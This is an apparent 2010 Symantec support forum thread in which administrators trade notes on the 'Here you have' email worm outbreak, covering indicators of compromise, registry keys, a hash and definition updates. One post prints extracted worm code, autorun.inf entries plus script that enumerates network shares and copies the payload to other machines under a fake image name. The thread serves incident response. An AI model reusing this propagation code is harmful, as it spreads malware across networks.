Endpoint Protection

Anyone else experiencing this?  Body of the messages hitting our GAL are as follows:

Hello:

This is The Document I told you about,you can find it Here.http://www.sharedocuments ******malicious link*************
Please check it and reply as soon as possible.


Cheers,

We are seeing it here in California.

Link is to a file with a .scr extension,  but appears to be an executable.   Messages are originating from our internal Exchange users and being sent to multiple distribution lists. 

Many reports of this coming in - http://www.google.com/search?q=here+you+have+virus+email&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a#q=here+you+have+virus+email&num=10&hl=en&client=firefox-a&hs=vjS&rls=org.mozilla:en-US:official&prmd=ivu&tbs=mbl:1&tbo=u&ei=4DOJTKOFCobM8wSapuXeDg&sa=X&oi=realtime_result_group_more_results_link&ct=title&resnum=1&ved=0CCMQ5QUwAA&fp=7b300381c1cbb03f

we have got same any solution from symantec yet

Huge virus outbreak at my firm.

I opened a case with Symantec support,  they said a rapid release definition is forthcoming but no ETA at this time.

If anyone does get word on a rapid release, please share.

This is better served with an anti-spam product and not Endpoint Protection which has no Anti-spam capabilities natively.  

It was submitted to Symantec's brightmail submission line for North America and I'm sure an anti-spam rule will be created asap.

Here's what we've pulled out so far.  Your mileage may vary.

The malicious file linked in the e-mail is shown as a pdf but it's actually a .scr.  I don't have the site here but we blocked it first thing.

Files:
Look for n73.image12.03.2009.JPG.scr and kill it.  Registry entries show “pdf*.scr” so anything matching that pattern are suspect
In c:\windows:
                Csrss.exe <-that’s a big part of this
                ff.exe
                gc.exe
                hst.iq
                ie.exe
                im.exe
                op.exe
                pspv.exe
                rd.exe
                re.exe
                re.iq
                tryme1.exe
 
Registry:
                Hklm\software\microsoft\windows nt\currentversion\image file execution options\<any key ending in ExE> ß pay attention to the case
                Hklm\software\microsoft\search assistant\ACMru\5603 and possibly 5604

Here's some code we pulled out of the .scr
 
[autorun]
open=open.exe
icon=%windir%\system32\shell32.dll,8
action=Open Drive to view files
shell\open=Open
shell\open\command=open.exe
shell\open\default=1
' List Network Shares
Const HKEY_LOCAL_MACHINE = &H80000002
dim i
i="0"
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colShares = objWMIService.ExecQuery("Select * from Win32_Share")
For each objShare in colShares  
strComputer = "."
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & _
    strComputer & "\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
strValueName = i
strValue = objShare.Path
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
i = i + 1
Next
on error resume next
Dim domain
Dim computer
Set domain = GetObject("WinNT://Workgroup")
domain.Filter = Array("Computer")
For Each computer In domain
strComp = computer.Name
DoEvents
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\d\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\c\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\New Folder\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\music\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\print\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\E\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\F\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\G\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\H\" & "N73.Image12.03.2009.JPG.scr"
Next
Text4
[autorun]
open=open.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
action=Open folder to view files
shell\open=Open
shell\open\command=open.exe
shell\open\default=1


/back to work, don't ask me for help I'm a little busy lol

The messages are internal,  so obviously malware is involved here.

2bde56d8fb2df4438192fb46cd0cc9c9

you're welcome

Link in the email is to  http://members.multimedia.co.uk/............

First hit our corporate office and then spread through our subs.  First reports were at about 11:21am PDT.  Two hours later, Symantec has not raised their threat level and I cannot find any patches yet.

We are finding open.exe and autorun.inf in their h drives

We submitted toi Symantec and here is the response:

We have processed your submission (Tracking #------------) and your submission
is now closed. The following is a report of our findings for the files in
your submission:
 
File:  C:\Documents and
Settings\<some user id here>\Desktop\PDF_Document21_025542010_pdf.scr.trojan
Machine: Machine
Determination: This file is detected as 'Trojan Horse, ' with our existing
Rapid Release definition set.
URL: http://www.symantec.com/avcenter/venc/data/trojan.horse.html

The link goes to "rapid release" defs from 2004.  So by Symantec's logic, this is something already handled by SEP?

/golf clap.

SEP will not stop a spam email if there's no malicious code in it as it's not an anti-spam product. The malicious code comes from clicking on the link IN the email. As Teiva-boy said, if you want to stop the email itself from spreading to your user, use your anti-spam solution to do so, and educate your users to not click on the link inside the email.

Ted - I understand your point about spam and we are working to address that on our mail servers and spam blocking tools.  However, my concern is that once the link is clicked, SEP should block the malicious code from running and replicating the virus on the computer.  Our SEP is up to date and yet users (who shouldn't click on the link, but still do) are getting infected.  Does Symantec not intend to address this issue?

This is a new variant of W32.Imsolk.A@mm. Have you downloaded the latest rapid release definitions? If not then you do not have the most current definitions for this threat. "Trojan Horse" is a generic detection, most likely why the link for the RR definitions the previous poster were from 2004.

Edit: Actually it seems that new definitions are not out yet according to an earlier poster in this thread. But as he said, Security Response is working on it.

Just got off the phone with support..they said any rapid release definition sequence 114819 or higher should do the trick

Thanks for the information.

There you have it folks, go get the RR definitions ASAP.

If I update my SEPM using the JDB file procedures will my client get the new rapid release defs thru LU?

Yup, run command on your groups and tell them to update content.

Also just got an email from our SE....They will be releasing certified defs at 7PM EST.  Hope that helps.

Trojan Horse is indeed a generic detection, and while the initial date on the threat on the Security Response page may be dated 2004, additional detections are being added all the time.

sandra

Is this only if you use your SEPM in conjunction with LOCAL LiveUpdate server, or will SEPM actually feed rapid definitions to clients regardless? Also, does anyone know if after running rapid release defs, main page on SEP client should change?

To note, it spreads via network drive too, or should I say, it's copying autorun.inf and open.exe (inf points to exe, naturally) to ALL drives in My Computer, and if there are mapped drives, it will drop these two files in the root there as well. So scan your servers, too!

Any update to the releasing of the updates? 

FYI - we called a bit ago and the one that will come through Live Updates hasn't been released. 

From Security Response's page:
"Enterprise customers are protected by a Rapid Release signature set dated Sep 9th 2010 rev 023, or later. The next regular definition set to be published at 16:00 PST Sep 9th 2010 will contain the detection."

Current definitions, as of this writing:

Daily Updates

• Symantec AntiVirus
• Norton AntiVirus 2006/2007

Virus Definitions created 9/9/2010
Virus Definitions released 9/9/2010
Defs Version: 120909x
Sequence Number: 114820
Extended Version: 9/9/2010 rev. 24
Total Detections (Threats & Risks): 8483569

Detection for this threat should therefore be included currently.

sandra

Has the ETA for the certified definitions been pushed back? 

Will a removal tool be posted?  McAfee appears to have one...

Is there a location where Symantec is posting new information about this?  A blog perhaps?  

These are the best analysis links I've come across thus far:

http://www.threatexpert.com/report.aspx?md5=2bde56d8fb2df4438192fb46cd0cc9c9
http://www.threatexpert.com/report.aspx?md5=bd9208edf44d0ee32b974a2d9da7bc61
 

Does anyone know if SEP does a quick on-access scan once new definitions are loaded? I got r24 but csrss.exe is still alive and happy in memory and can be seen in Task Manager.

Email I received from Symantec at 9pm EST indicates this is fixed in definitions "rev. 037".

I'm only seeing rev 024 on the web site and its now 11:45pm EST.  Hello Symantec anybody home?

I believe r37 are rapid dats. However in my post above, even rapid dats are unable to desinfect file from memory..

You should be able to set a scan "when new defs arrive" in SEPM

The latest rapid release is dated 2010.09.09 rev.50.

Do you have a direct link for these?

Who marks a post as "solution"?  Shouldn't the affected customers decide when the issue has been resolved?

http://www.symantec.com/business/security_response/writeup.jsp?docid=2010-090922-4703-99&tabid=3

http://support.microsoft.com/kb/q263455/

First update using rapid release updates and then try to scan.A signature has been added in the latest rapid release ref:Security Response.You can download it from this link
Rapid Release Virus Definitions

If you want to know how to update using rapid release refer these KBs.
How to update definitions for Symantec Endpoint Protection Manager using a JDB file
Using Rapid Release virus definitions to update Symantec AntiVirus 10.x or Symantec Client Security 3.x clients and server

  How to update definitions for Symantec Endpoint Protection using the Intelligent Updater
 

Hello Forum Community,

This blog posting is quite good. 

New Round of Email Worm, "Here you have"  https://www-secure.symantec.com/connect/blogs/new-round-email-worm-here-you-have 

Thanks and best regards,

Mick

Here is a writeup for the same

W32.Imsolk.B@mm
Web URL: http://www.symantec.com/security_response/writeup.jsp?docid=2010-090922-4703-99

Certified LiveUpdate definitions have now been posted for the same.

At first many thanks for the given Information!

I used the rapid release update and the client(s) show Signature version 0909 v54 but in the dashboard the client is still shown as vulnerable to this threat!

why is that???

Regards

Stephan Gruhn

I'm guessing you mean the dashboard on the SEPM, which is reporting historical information (last 12 hours).  Go with the actual signature date/revision.

sandra

So how can i compare the actual status of vulnaribilty to the implemented signature on the client??Is there a ressource where i can lookup wich definitions protect me to a specific threat??

thanks for help

Stephan

I completely agree with this.  SEP Proactive Threat Protection should be able to catch this process SSMYPICS SCR running in memory.  Plus, you can't even add this to the exception list (only allows .EXE) to stop/quarantine it.

It's broke.